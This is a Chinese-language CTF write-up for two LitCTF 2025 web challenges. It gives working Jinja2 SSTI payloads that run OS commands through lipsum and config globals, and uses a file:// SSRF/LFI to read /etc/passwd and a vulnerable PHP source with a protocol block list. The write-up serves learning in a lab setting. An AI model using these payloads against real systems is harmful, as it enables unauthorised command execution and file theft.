[LitCTF 2025]星愿信箱easy_signin题解
[LitCTF 2025]星愿信箱
测试下是否存在SSTI,发现输入{{7*7}}被过滤了,那就可能是题目中将{{}}进行了过滤
进行绕过,如果{{被过滤,可以使用{% %}语法
可以正常回显
可以利用命令查看有那些函数,把当前 Jinja2 模板执行环境(上下文)中所有可以直接调用的变量名、函数名全部列出来
{%print(self.__dict__.TemplateReference_context.keys())%}进行测试,这里用lipsum
{% print(lipsum.__globals__['__builtins__']['__import__']('os').popen('whoami').read()) %}查看根目录下的内容,找到flag文件
{% print(lipsum.__globals__['__builtins__']['__import__']('os').popen('ls /').read()) %}因为这里对读取命令有一点小过滤,所以进行绕过一下:tac /f*
{% print(lipsum.__globals__['__builtins__']['__import__']('os').popen('tac /f*').read()) %}使用config也可以
{% print(config.__init__.__globals__['os'].popen('whoami').read()) %}[LitCTF 2025]easy_signin
题目403,先扫一下目录
扫到两个目录
尝试登录一直显示账号错误,然后账号不能进行修改
修改前端代码更换账号也是显示账号错误
查看下源码,发现个api.js
有个路径/api/sys/urlcode.php
尝试读取/etc/passwd,发现可以成功读取到
?url=file:///etc/passwdfile协议可用,利用file协议进行源码读取
查看源码
得到源码中禁止的一些协议ftp://', 'php://', 'zlib://', 'data://', 'glob://', 'phar://', 'ssh2://', 'rar://', 'ogg://', 'expect://
<b>file:///var/www/html/api/sys/urlcode.php 的快照如下:</b><br><br><pre><?php error_reporting(0); function curl($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } $url = $_REQUEST['url']; if($url){ $forbidden_protocols = ['ftp://', 'php://', 'zlib://', 'data://', 'glob://', 'phar://', 'ssh2://', 'rar://', 'ogg://', 'expect://']; $protocol_block = false; foreach ($forbidden_protocols as $proto) { if (strpos($url, $proto) === 0) { $protocol_block = true; break; } } $log_block = strpos($url, '.log') !== false; if ($protocol_block) { echo "禁止访问:不允许使用 {$proto} 协议"; } elseif ($log_block) { echo "禁止访问:URL 包含 .log"; } elseif (strpos($url, 'login.php') !== false || strpos($url, 'dashboard.php') !== false || strpos($url, '327a6c4304ad5938eaf0efb6cc3e53dc.php') !== false) { echo "看不见哦"; } else { echo "<b>".$url." 的快照如下:</b><br><br>"; echo "<pre>"; curl($url); include($url); echo "</pre>"; } } ?>这直接访问这个/327a6c4304ad5938eaf0efb6cc3e53dc.php,就得到了flag,好像是非预期